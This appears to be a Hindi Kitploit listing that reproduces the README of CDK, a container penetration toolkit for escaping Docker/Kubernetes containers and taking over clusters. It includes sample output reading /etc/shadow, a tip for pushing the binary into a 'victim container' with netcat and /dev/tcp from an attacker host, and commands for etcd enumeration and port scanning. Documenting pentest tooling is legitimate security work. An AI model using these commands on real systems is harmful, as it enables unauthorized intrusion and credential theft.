Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CDK — 📦 K8s, Docker और Containerd की सुरक्षा परीक्षण को आसान बनाएं। | Kitploit
उपकरण/GitHubGitHub/cdk-team/cdk
विशेषाधिकार वृद्धिटोहीकंटेनर सुरक्षास्थायित्व तंत्रशोषणपार्श्व आंदोलनपोस्ट-शोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षाकंटेनर एस्केपकंटेनर एस्केप में शीर्ष #2
4.7k606655 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHubcdk-team/cdk

CDK

📦 K8s, Docker और Containerd की सुरक्षा परीक्षण को आसान बनाएं।

रिपॉजिटरी देखेंवेबसाइट

CDK - जीरो डिपेंडेंसी कंटेनर पेनिट्रेशन टूलकिट

अंग्रेज़ी | 简体中文

png

कानूनी अस्वीकरण

बिना पूर्व पारस्परिक सहमति के लक्ष्यों पर हमला करने के लिए CDK का उपयोग अवैध है। CDK केवल सुरक्षा परीक्षण उद्देश्यों के लिए है।

अवलोकन

CDK एक ओपन-सोर्स कंटेनर पेनिट्रेशन टूलकिट है, जिसे बिना किसी OS निर्भरता के विभिन्न स्लिम्ड कंटेनरों में स्थिर शोषण प्रदान करने के लिए डिज़ाइन किया गया है। यह उपयोगी नेट-टूल्स और कई शक्तिशाली PoCs/EXPs के साथ आता है और आपको कंटेनर से बचने और आसानी से K8s क्लस्टर को अपने कब्जे में लेने में मदद करता है।

त्वरित आरंभ

मूल्यांकन जानकारी और एक अनुशंसित शोषण प्राप्त करने के लिए cdk eva चलाएं, फिर हमला शुरू करने के लिए cdk run चलाएं।

> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

स्थापना/वितरण

https://github.com/cdk-team/CDK/releases/ से नवीनतम रिलीज़ डाउनलोड करें।

निष्पादन योग्य फ़ाइलों को लक्ष्य कंटेनर में डालें और परीक्षण शुरू करें।

सुझाव: वास्तविक दुनिया के पेनिट्रेशन परीक्षण में CDK को लक्ष्य कंटेनर में पहुंचाना

यदि आपके पास एक शोषण है जो फ़ाइल अपलोड कर सकता है, तो आप सीधे CDK बाइनरी अपलोड कर सकते हैं।

यदि आपके पास RCE शोषण है, लेकिन लक्ष्य कंटेनर में curl या wget नहीं है, तो आप CDK देने के लिए निम्न विधि का उपयोग कर सकते हैं:

  1. पहले, अपने होस्ट पर सार्वजनिक IP के साथ CDK बाइनरी होस्ट करें।
(on your host)
nc -lvp 999 < cdk
  1. पीड़ित कंटेनर के अंदर निष्पादित करें
cat < /dev/tcp/(your_public_host_ip)/(port) > cdk
chmod a+x cdk

उपयोग

Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Gather information to find weakness inside container.
  cdk evaluate --full                       Enable file scan during information gathering.

Exploit:
  cdk run --list                            List all available exploits.
  cdk run <exploit> [<args>...]             Run single exploit, docs in https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Edit files in container like "vi" command.
  ps                                        Show process information like "ps -ef" command.
  nc [options]                              Create TCP tunnel.
  ifconfig                                  Show network information.
  kcurl <path> (get|post) <uri> <data>      Make request to K8s api-server.
  ectl <endpoint> get <key>                 Unauthorized enumeration of ectd keys.
  ucurl (get|post) <socket> <uri> <data>    Make request to docker unix socket.
  probe <ip> <port> <parallel> <timeout-ms> TCP port scan, example: cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Show this help msg.
  -v --version  Show version.
  --profile=<name> Select evaluation profile.

विशेषताएं

CDK में तीन मॉड्यूल हैं:

  1. मूल्यांकन: संभावित कमजोरी खोजने के लिए कंटेनर के अंदर जानकारी एकत्र करें।
  2. शोषण: कंटेनर से बचने, स्थिरता और पार्श्व गति के लिए
  3. उपकरण: TCP/HTTP अनुरोधों, टनल और K8s क्लस्टर प्रबंधन के लिए नेटवर्क-टूल्स और API।

मूल्यांकन मॉड्यूल

उपयोग

cdk evaluate [--full]
रणनीतिस्क्रिप्टसमर्थितउपयोग/उदाहरण
सूचना संग्रहOS Basic Info✔link
सूचना संग्रहउपलब्ध क्षमताएँ✔link
सूचना संग्रहउपलब्ध Linux कमांड✔link
सूचना संग्रहमाउंट्स✔link
सूचना संग्रहनेट नेमस्पेस✔link
सूचना संग्रहसंवेदनशील ENV✔link
सूचना संग्रहसंवेदनशील प्रक्रिया✔link
सूचना संग्रहसंवेदनशील स्थानीय फ़ाइलें✔link
सूचना संग्रहKube-proxy Route Localnet(CVE-2020-8558)✔link
सूचना संग्रहDNS-आधारित सेवा खोज✔link
खोजK8s Api-सर्वर जानकारी✔link
खोजK8s सेवा-खाता जानकारी✔link
खोजक्लाउड प्रदाता मेटाडेटा API✔link

शोषण मॉड्यूल

सभी उपलब्ध शोषण सूचीबद्ध करें:

cdk run --list

लक्षित शोषण चलाएं:

cdk run <script-name> [options]
टूल डाउनलोड करें